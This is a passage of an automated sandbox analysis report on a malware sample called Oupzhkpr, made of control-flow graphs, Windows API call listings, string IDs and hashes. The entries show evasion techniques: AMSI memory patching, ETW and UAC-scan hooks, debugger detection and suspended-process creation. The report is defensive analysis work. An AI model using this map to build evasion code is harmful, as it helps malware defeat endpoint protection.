2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 5675->5993 5676->5675 5822->5554 5823->5822 5992->5993 5993->5464
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
                                                                                                                                • Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
                                                                                                                                • Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(02D157D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D157DC,02D15820,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00), ref: 02BE7E31
                                                                                                                              • ResumeThread.KERNEL32(02D15824,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0), ref: 02BE847B
                                                                                                                              • CloseHandle.KERNEL32(02D15820,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00,02BEAFD0,02D15824,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00), ref: 02BE85FA
                                                                                                                                • Part of subcall function 02BD8798: LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
                                                                                                                                • Part of subcall function 02BD8798: GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
                                                                                                                                • Part of subcall function 02BD8798: FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802
                                                                                                                              • CloseHandle.KERNEL32(02D15820,02D15820,ScanBuffer,02C1CF00,02BEAFD0,UacInitialize,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00), ref: 02BE89EC
                                                                                                                                • Part of subcall function 02BDDAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDB03
                                                                                                                                • Part of subcall function 02BDDAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02BDDB6A
                                                                                                                                • Part of subcall function 02BDDAC4: NtClose.NTDLL(?), ref: 02BDDB73
                                                                                                                                • Part of subcall function 02BD8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02BD820E), ref: 02BD81F0
                                                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,Initialize,02C1CF00,02BEAFD0,00000000,00000000,00000000,ScanString,02C1CF00,02BEAFD0), ref: 02BEAA1D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleLibrary$AddressFreePathProcProcess$CacheCreateExitFileFlushInstructionLoadModuleNameName_ResumeThreadUserWrite
                                                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                              • API String ID: 4004194653-1225450241
                                                                                                                              • Opcode ID: 649d75744e524ea1ba674236d0d6ba02ba4af1513b27a2a1af460c6b7e411d00
                                                                                                                              • Instruction ID: 6c1e2a4877686e66390d83081dad08db2f12d0f90c622acbbe593711da96208c
                                                                                                                              • Opcode Fuzzy Hash: 649d75744e524ea1ba674236d0d6ba02ba4af1513b27a2a1af460c6b7e411d00
                                                                                                                              • Instruction Fuzzy Hash: CC43F876B401589FDB11FB64DD909DE73BABF94300F2045EAE10AA7218DB31AF968F41

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 8533 2bc1727-2bc1736 8534 2bc173c-2bc174c 8533->8534 8535 2bc1968-2bc196d 8533->8535 8538 2bc174e-2bc175b 8534->8538 8539 2bc17a4-2bc17ad 8534->8539 8536 2bc1a80-2bc1a83 8535->8536 8537 2bc1973-2bc1984 8535->8537 8543 2bc1a89-2bc1a8b 8536->8543 8544 2bc1684-2bc16ad VirtualAlloc 8536->8544 8540 2bc1938-2bc1945 8537->8540 8541 2bc1986-2bc19a2 8537->8541 8545 2bc175d-2bc176a 8538->8545 8546 2bc1774-2bc1780 8538->8546 8539->8538 8542 2bc17af-2bc17bb 8539->8542 8540->8541 8554 2bc1947-2bc195b Sleep 8540->8554 8549 2bc19a4-2bc19ac 8541->8549 8550 2bc19b0-2bc19bf 8541->8550 8542->8538 8551 2bc17bd-2bc17c9 8542->8551 8552 2bc16df-2bc16e5 8544->8552 8553 2bc16af-2bc16dc call 2bc1644 8544->8553 8555 2bc176c-2bc1770 8545->8555 8556 2bc1794-2bc17a1 8545->8556 8547 2bc17f0-2bc17f9 8546->8547 8548 2bc1782-2bc1790 8546->8548 8562 2bc182c-2bc1836 8547->8562 8563 2bc17fb-2bc1808 8547->8563 8557 2bc1a0c-2bc1a22 8549->8557 8558 2bc19d8-2bc19e0 8550->8558 8559 2bc19c1-2bc19d5 8550->8559 8551->8538 8560 2bc17cb-2bc17de Sleep 8551->8560 8553->8552 8554->8541 8564 2bc195d-2bc1964 Sleep 8554->8564 8570 2bc1a3b-2bc1a47 8557->8570 8571 2bc1a24-2bc1a32 8557->8571 8566 2bc19fc-2bc19fe call 2bc15cc 8558->8566 8567 2bc19e2-2bc19fa 8558->8567 8559->8557 8560->8538 8565 2bc17e4-2bc17eb Sleep 8560->8565 8572 2bc18a8-2bc18b4 8562->8572 8573 2bc1838-2bc1863 8562->8573 8563->8562 8569 2bc180a-2bc181e Sleep 8563->8569 8564->8540 8565->8539 8576 2bc1a03-2bc1a0b 8566->8576 8567->8576 8569->8562 8578 2bc1820-2bc1827 Sleep 8569->8578 8582 2bc1a68 8570->8582 8583 2bc1a49-2bc1a5c 8570->8583 8571->8570 8579 2bc1a34 8571->8579 8574 2bc18dc-2bc18eb call 2bc15cc 8572->8574 8575 2bc18b6-2bc18c8 8572->8575 8580 2bc187c-2bc188a 8573->8580 8581 2bc1865-2bc1873 8573->8581 8594 2bc18fd-2bc1936 8574->8594 8598 2bc18ed-2bc18f7 8574->8598 8588 2bc18cc-2bc18da 8575->8588 8589 2bc18ca 8575->8589 8578->8563 8579->8570 8584 2bc188c-2bc18a6 call 2bc1500 8580->8584 8585 2bc18f8 8580->8585 8581->8580 8591 2bc1875 8581->8591 8586 2bc1a6d-2bc1a7f 8582->8586 8583->8586 8587 2bc1a5e-2bc1a63 call 2bc1500 8583->8587 8584->8594 8585->8594 8587->8586 8588->8594 8589->8588 8591->8580
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 02BC17D0
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 02BC17E6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 3b9e03e425e7f3fccdbc7018bcf27ac0bc4cbbae9d8eec1c2eefbad62a8d544a
                                                                                                                              • Instruction ID: c5381f9b941650d7132a5041072ac86583c1d2be3d2ae68168e3947ca64c3841
                                                                                                                              • Opcode Fuzzy Hash: 3b9e03e425e7f3fccdbc7018bcf27ac0bc4cbbae9d8eec1c2eefbad62a8d544a
                                                                                                                              • Instruction Fuzzy Hash: EEB11276A143518BEB15CF2CD880355BBE1FF86310F2886EED959EB386D770A461CB90

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 8599 2bd8798-2bd87bd LoadLibraryW 8600 2bd87bf-2bd87d7 GetProcAddress 8599->8600 8601 2bd8807-2bd880d 8599->8601 8602 2bd87fc-2bd8802 FreeLibrary 8600->8602 8603 2bd87d9-2bd87f8 call 2bd7cf8 8600->8603 8602->8601 8603->8602 8606 2bd87fa 8603->8606 8606->8602
                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
                                                                                                                              • GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
                                                                                                                              • FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802
                                                                                                                                • Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                                                              • API String ID: 1002360270-4067648912
                                                                                                                              • Opcode ID: f624dd9365abbbf0e33c3adc3b60a8f750c01104b6b56673bb421d28ca974486
                                                                                                                              • Instruction ID: 40d7bc5506e7ec63b8eccac3af88c7ae077f458b04e7efe75c82cf0b767a5f9e
                                                                                                                              • Opcode Fuzzy Hash: f624dd9365abbbf0e33c3adc3b60a8f750c01104b6b56673bb421d28ca974486
                                                                                                                              • Instruction Fuzzy Hash: 1BF0A471A922286EEB20EB69AA44FB6779ED380355F0A0A7DB10C87542DFF158188B50

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 02BD870D
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                                • Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02BD876C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                                                              • API String ID: 2980007069-2671292670
                                                                                                                              • Opcode ID: f5ebcc5a37a0d726a768f85cc82c7a3a13e30b286232038b98fab1a16662d144
                                                                                                                              • Instruction ID: 4bfeb595d9a4f38768667c67e4cc0ab7d08646b791819bd1efed1fbd888d73bd
                                                                                                                              • Opcode Fuzzy Hash: f5ebcc5a37a0d726a768f85cc82c7a3a13e30b286232038b98fab1a16662d144
                                                                                                                              • Instruction Fuzzy Hash: 6BF0C26054C381B9E201E6788C45FCBBFCD4B92324F448E9DB1F85A2D2EA79D1059BB7

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 8616 2bdebe8-2bdec02 GetModuleHandleW 8617 2bdec2e-2bdec36 8616->8617 8618 2bdec04-2bdec16 GetProcAddress 8616->8618 8618->8617 8619 2bdec18-2bdec28 CheckRemoteDebuggerPresent 8618->8619 8619->8617 8620 2bdec2a 8619->8620 8620->8617
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 02BDEBF8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02BDEC0A
                                                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02BDEC21
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                              • API String ID: 35162468-539270669
                                                                                                                              • Opcode ID: a358fb7d109c22ec1638a5c3f622db4196bb0e6eba1d1d1b394ac5831b1fcc98
                                                                                                                              • Instruction ID: c4dbcdaa0ae491328975ddc60c20d04791b7fd0e4d25c927f6ef6efb1c8caf70
                                                                                                                              • Opcode Fuzzy Hash: a358fb7d109c22ec1638a5c3f622db4196bb0e6eba1d1d1b394ac5831b1fcc98
                                                                                                                              • Instruction Fuzzy Hash: 01F0A73090424CAED712A7EC88887DCFBA99B05328F680BD4A464751D1F7715640C651

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 8621 2bc1a8f-2bc1a9b 8622 2bc1b6c-2bc1b6f 8621->8622 8623 2bc1aa1-2bc1aa5 8621->8623 8624 2bc1c5c-2bc1c60 8622->8624 8625 2bc1b75-2bc1b7f 8622->8625 8626 2bc1b08-2bc1b11 8623->8626 8627 2bc1aa7-2bc1aae 8623->8627 8630 2bc16e8-2bc16f0 call 2bc1644 8624->8630 8631 2bc1c66-2bc1c6b 8624->8631 8628 2bc1b3c-2bc1b49 8625->8628 8629 2bc1b81-2bc1b8d 8625->8629 8626->8627 8634 2bc1b13-2bc1b27 Sleep 8626->8634 8632 2bc1adc-2bc1ade 8627->8632 8633 2bc1ab0-2bc1abb 8627->8633 8628->8629 8643 2bc1b4b-2bc1b5f Sleep 8628->8643 8635 2bc1b8f-2bc1b92 8629->8635 8636 2bc1bc4-2bc1bd2 8629->8636 8647 2bc16f5-2bc170b VirtualFree 8630->8647 8637 2bc1ae0-2bc1af1 8632->8637 8638 2bc1af3 8632->8638 8639 2bc1abd-2bc1ac2 8633->8639 8640 2bc1ac4-2bc1ad9 8633->8640 8634->8627 8642 2bc1b2d-2bc1b38 Sleep 8634->8642 8644 2bc1b96-2bc1b9a 8635->8644 8636->8644 8646 2bc1bd4-2bc1bd9 call 2bc14c0 8636->8646 8637->8638 8645 2bc1af6-2bc1b03 8637->8645 8638->8645 8642->8626 8643->8629 8648 2bc1b61-2bc1b68 Sleep 8643->8648 8649 2bc1bdc-2bc1be9 8644->8649 8650 2bc1b9c-2bc1ba2 8644->8650 8645->8625 8646->8644 8652 2bc170d-2bc1714 8647->8652 8653 2bc1716 8647->8653 8648->8628 8649->8650 8658 2bc1beb-2bc1bf2 call 2bc14c0 8649->8658 8654 2bc1bf4-2bc1bfe 8650->8654 8655 2bc1ba4-2bc1bc2 call 2bc1500 8650->8655 8656 2bc1719-2bc1723 8652->8656 8653->8656 8659 2bc1c2c-2bc1c59 call 2bc1560 8654->8659 8660 2bc1c00-2bc1c28 VirtualFree 8654->8660 8656->8621 8658->8650
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000), ref: 02BC1B17
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 02BC1B31
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: fc4fda0f660dea1d4d849aa9ffaa128f1832c03af0f4a5e33d7e25ff071fb35c
                                                                                                                              • Instruction ID: 647f1e294043990e69203b0cc348e0d35cd53ab8ddb31af2f55ed1672b65922e
                                                                                                                              • Opcode Fuzzy Hash: fc4fda0f660dea1d4d849aa9ffaa128f1832c03af0f4a5e33d7e25ff071fb35c
                                                                                                                              • Instruction Fuzzy Hash: E351BE756212408FE715CF6CC984756BBD0EF46314F2886EEE988EB287E770D445CBA1

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                              • WinExec.KERNEL32(?,?), ref: 02BD8470
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$ExecHandleModule
                                                                                                                              • String ID: Kernel32$WinExec
                                                                                                                              • API String ID: 3402293670-3609268280
                                                                                                                              • Opcode ID: 8dbd548ecb687c6f006f84467ac725182bb89bfbc2d69b2e358fd677300aa2f8
                                                                                                                              • Instruction ID: 5ed786da6bd61ca1ae1687a793d9bc383568326239cb93dffaba5abb78075cdd
                                                                                                                              • Opcode Fuzzy Hash: 8dbd548ecb687c6f006f84467ac725182bb89bfbc2d69b2e358fd677300aa2f8
                                                                                                                              • Instruction Fuzzy Hash: DD01D635640208BFE710EFA5DC11B9A77FEE708710F6584A0B508C7500EAB4BE008F24
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                              • WinExec.KERNEL32(?,?), ref: 02BD8470
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$ExecHandleModule
                                                                                                                              • String ID: Kernel32$WinExec
                                                                                                                              • API String ID: 3402293670-3609268280
                                                                                                                              • Opcode ID: 6ed4597d860bc71319528d94c711687bde3bebd8784aa9afefd0ca04cd1ea076
                                                                                                                              • Instruction ID: 2f38a447cd457df8f9f96c0a50c3d893448ac22d1d330972d958d1c28d201279
                                                                                                                              • Opcode Fuzzy Hash: 6ed4597d860bc71319528d94c711687bde3bebd8784aa9afefd0ca04cd1ea076
                                                                                                                              • Instruction Fuzzy Hash: BDF0F935640208BFE710EFA5DC11F8A77FEE708710F6584A0B508C7500EAB4BA008F24
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
                                                                                                                              • GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
                                                                                                                                • Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C
                                                                                                                              • FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressFreeHandleLibraryMemoryModuleProcVirtualWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3588955079-0
                                                                                                                              • Opcode ID: 24ab985b0852dc593805f6334e3121342722098b9995dc8ab67a82e9a2e58a2a
                                                                                                                              • Instruction ID: 483d24a621c97a85ba7aad152d8633f866464412aec9686be7c87e4710362ec6
                                                                                                                              • Opcode Fuzzy Hash: 24ab985b0852dc593805f6334e3121342722098b9995dc8ab67a82e9a2e58a2a
                                                                                                                              • Instruction Fuzzy Hash: CF117F71A40314AFEB10FBA8CE11E9E77AE9B84710F6604F8760CA7A41DEB4DE008B14
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 198179651190d95c7ae7bae729b6b2db0cecab20e8456ee8fd15452ea8f0fde0
                                                                                                                              • Instruction ID: 410adb53e691b7d32720cab56b0abe3cdbf43b27abefee3b2e9172a28ee9c1b4
                                                                                                                              • Opcode Fuzzy Hash: 198179651190d95c7ae7bae729b6b2db0cecab20e8456ee8fd15452ea8f0fde0
                                                                                                                              • Instruction Fuzzy Hash: 2341A974C10200DFDB24DF28E0A875A3BF1FB55724F3989AEE8089B241CB749A95CF91
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(209D1B20,?,00000105), ref: 02BC5832
                                                                                                                                • Part of subcall function 02BC5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02BC5A94
                                                                                                                                • Part of subcall function 02BC5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AB2
                                                                                                                                • Part of subcall function 02BC5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AD0
                                                                                                                                • Part of subcall function 02BC5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02BC5AEE
                                                                                                                                • Part of subcall function 02BC5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02BC5B37
                                                                                                                                • Part of subcall function 02BC5A78: RegQueryValueExA.ADVAPI32(?,02BC5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001), ref: 02BC5B55
                                                                                                                                • Part of subcall function 02BC5A78: RegCloseKey.ADVAPI32(?,02BC5B84,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5B77
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2796650324-0
                                                                                                                              • Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                              • Instruction ID: 09c001ac218ea662347d9f1920546c90498798a8f042006f1941e719b0278e36
                                                                                                                              • Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                                                                              • Instruction Fuzzy Hash: 5DE06D71A002148BCB24DE5C88C0A4637D8AB08750F5005A9EC58EF34AD370F9608BD0
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,02BE2A41,ScanString,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,Initialize), ref: 02BC7E3F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                                              • Instruction ID: 3f3f9df70671c453fa6129c4682d78f5f378bae80886c909db1f9002ac080a1b
                                                                                                                              • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                                                                              • Instruction Fuzzy Hash: 4CC08CE22022090F1E90A2FC0CC490A428C8B441383B02FE9E638C61D2DB21D8523810
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Eventtime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2982266575-0
                                                                                                                              • Opcode ID: 7569ee3d954793ba1e20d03a7cc28807cfd7731bc36eb8a14ecf235733cb6c16
                                                                                                                              • Instruction ID: bf5f999bd23d6134a6f4eb65104e56918abc8802b74151fcc918146db0753293
                                                                                                                              • Opcode Fuzzy Hash: 7569ee3d954793ba1e20d03a7cc28807cfd7731bc36eb8a14ecf235733cb6c16
                                                                                                                              • Instruction Fuzzy Hash: ADC092F27903403EFA10A6B86CC2F231A8DE354B01F6004A6BA05EE6C2D2EA4C504A74
                                                                                                                              APIs
                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02BC4BEB
                                                                                                                              Memory Dump Source
